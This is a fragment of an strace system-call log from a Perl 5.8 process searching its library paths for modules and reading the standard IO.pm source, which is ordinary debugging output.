7394  07:18:31.423713 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfa4ebc0) = -1 ENOENT (No such file or directory)

7394  07:18:31.423729 stat64("/usr/local/lib/perl/5.8.7", 0xbfa4ed00) = -1 ENOENT (No such file or directory)

7394  07:18:31.423741 stat64("/usr/local/share/perl/5.8.7", 0xbfa4ed00) = -1 ENOENT (No such file or directory)

7394  07:18:31.423754 stat64("/usr/local/lib/perl/5.8.6", 0xbfa4ed00) = -1 ENOENT (No such file or directory)

7394  07:18:31.423765 stat64("/usr/local/share/perl/5.8.6", 0xbfa4ed00) = -1 ENOENT (No such file or directory)

7394  07:18:31.423777 stat64("/usr/local/lib/perl/5.8.4", 0xbfa4ed00) = -1 ENOENT (No such file or directory)

7394  07:18:31.423789 stat64("/usr/local/share/perl/5.8.4", 0xbfa4ed00) = -1 ENOENT (No such file or directory)

7394  07:18:31.423801 stat64("/usr/local/lib/perl/5.8.3", 0xbfa4ed00) = -1 ENOENT (No such file or directory)

7394  07:18:31.423812 stat64("/usr/local/share/perl/5.8.3", 0xbfa4ed00) = -1 ENOENT (No such file or directory)

7394  07:18:31.423824 stat64("/usr/local/lib/perl/5.8.2", 0xbfa4ed00) = -1 ENOENT (No such file or directory)

7394  07:18:31.423835 stat64("/usr/local/share/perl/5.8.2", 0xbfa4ed00) = -1 ENOENT (No such file or directory)

7394  07:18:31.423847 stat64("/usr/local/lib/perl/5.8.1", 0xbfa4ed00) = -1 ENOENT (No such file or directory)

7394  07:18:31.423858 stat64("/usr/local/share/perl/5.8.1", 0xbfa4ed00) = -1 ENOENT (No such file or directory)

7394  07:18:31.423870 stat64("/usr/local/lib/perl/5.8.0", 0xbfa4ed00) = -1 ENOENT (No such file or directory)

7394  07:18:31.423881 stat64("/usr/local/share/perl/5.8.0", 0xbfa4ed00) = -1 ENOENT (No such file or directory)

7394  07:18:31.423903 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfa4e9f8) = -1 ENOTTY (Inappropriate ioctl for device)

7394  07:18:31.423917 _llseek(0, 0, [0], SEEK_CUR) = 0

7394  07:18:31.423929 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfa4e9f8) = -1 EBADF (Bad file descriptor)

7394  07:18:31.423967 _llseek(1, 0, 0xbfa4ea40, SEEK_CUR) = -1 EBADF (Bad file descriptor)

7394  07:18:31.423980 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfa4e9f8) = -1 EINVAL (Invalid argument)

7394  07:18:31.423991 _llseek(2, 0, 0xbfa4ea40, SEEK_CUR) = -1 ESPIPE (Illegal seek)

7394  07:18:31.424015 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1

7394  07:18:31.424028 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfa4eab8) = -1 ENOTTY (Inappropriate ioctl for device)

7394  07:18:31.424039 _llseek(1, 0, [0], SEEK_CUR) = 0

7394  07:18:31.424050 fcntl64(1, F_SETFD, FD_CLOEXEC) = 0

7394  07:18:31.424061 fstat64(1, {st_mode=S_IFCHR|0666, st_rdev=makedev(1, 3), ...}) = 0

7394  07:18:31.424083 rt_sigaction(SIGCHLD, NULL, {SIG_DFL}, 8) = 0

7394  07:18:31.424135 readlink("/proc/self/exe", "/usr/bin/perl", 4095) = 13

7394  07:18:31.424182 getppid()         = 7392

7394  07:18:31.424241 stat64("/etc/perl/IO.pmc", 0xbfa4e7ac) = -1 ENOENT (No such file or directory)

7394  07:18:31.424255 stat64("/etc/perl/IO.pm", 0xbfa4e6bc) = -1 ENOENT (No such file or directory)

7394  07:18:31.424268 stat64("/usr/local/lib/perl/5.8.8/IO.pmc", 0xbfa4e7ac) = -1 ENOENT (No such file or directory)

7394  07:18:31.424280 stat64("/usr/local/lib/perl/5.8.8/IO.pm", 0xbfa4e6bc) = -1 ENOENT (No such file or directory)

7394  07:18:31.424294 stat64("/usr/local/share/perl/5.8.8/IO.pmc", 0xbfa4e7ac) = -1 ENOENT (No such file or directory)

7394  07:18:31.424306 stat64("/usr/local/share/perl/5.8.8/IO.pm", 0xbfa4e6bc) = -1 ENOENT (No such file or directory)

7394  07:18:31.424320 stat64("/usr/lib/perl5/IO.pmc", 0xbfa4e7ac) = -1 ENOENT (No such file or directory)

7394  07:18:31.424331 stat64("/usr/lib/perl5/IO.pm", 0xbfa4e6bc) = -1 ENOENT (No such file or directory)

7394  07:18:31.424344 stat64("/usr/share/perl5/IO.pmc", 0xbfa4e7ac) = -1 ENOENT (No such file or directory)

7394  07:18:31.424357 stat64("/usr/share/perl5/IO.pm", 0xbfa4e6bc) = -1 ENOENT (No such file or directory)

7394  07:18:31.424369 stat64("/usr/lib/perl/5.8/IO.pmc", 0xbfa4e7ac) = -1 ENOENT (No such file or directory)

7394  07:18:31.424382 stat64("/usr/lib/perl/5.8/IO.pm", {st_mode=S_IFREG|0644, st_size=413, ...}) = 0

7394  07:18:31.424403 open("/usr/lib/perl/5.8/IO.pm", O_RDONLY|O_LARGEFILE) = 6

7394  07:18:31.424416 ioctl(6, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfa4e4c8) = -1 ENOTTY (Inappropriate ioctl for device)

7394  07:18:31.424428 _llseek(6, 0, [0], SEEK_CUR) = 0

7394  07:18:31.424496 read(6, "#\n\npackage IO;\n\nuse XSLoader ();\nuse Carp;\nuse strict;\nuse warnings;\n\nour $VERSION = \"1.22\";\nXSLoader::load \'IO\', $VERSION;\n\nsub import {\n    shift;\n\n    warnings::warnif(\'deprecated\', qq{Parameterless \"use IO\" deprecated})\n        if @_ == 0 ;\n    \n    my @l = @_ ? @_ : qw(Handle Seekable File Pipe Socket Dir);\n\n    eval join(\"\", map { \"require IO::\" . (/(\\w+)/)[0] . \";\\n\" } @l)\n\tor croak $@;\n}\n\n1;\n\n__END__\n\n", 4096) = 413

7394  07:18:31.424557 stat64("/etc/perl/XSLoader.pmc", 0xbfa4e2fc) = -1 ENOENT (No such file or directory)

7394  07:18:31.424584 stat64("/etc/perl/XSLoader.pm", 0xbfa4e20c) = -1 ENOENT (No such file or directory)

7394  07:18:31.424598 stat64("/usr/local/lib/perl/5.8.8/XSLoader.pmc", 0xbfa4e2fc) = -1 ENOENT (No such file or directory)

7394  07:18:31.424611 stat64("/usr/local/lib/perl/5.8.8/XSLoader.pm", 0xbfa4e20c) = -1 ENOENT (No such file or directory)

7394  07:18:31.424625 stat64("/usr/local/share/perl/5.8.8/XSLoader.pmc", 0xbfa4e2fc) = -1 ENOENT (No such file or directory)

7394  07:18:31.424638 stat64("/usr/local/share/perl/5.8.8/XSLoader.pm", 0xbfa4e20c) = -1 ENOENT (No such file or directory)

7394  07:18:31.424652 stat64("/usr/lib/perl5/XSLoader.pmc", 0xbfa4e2fc) = -1 ENOENT (No such file or directory)

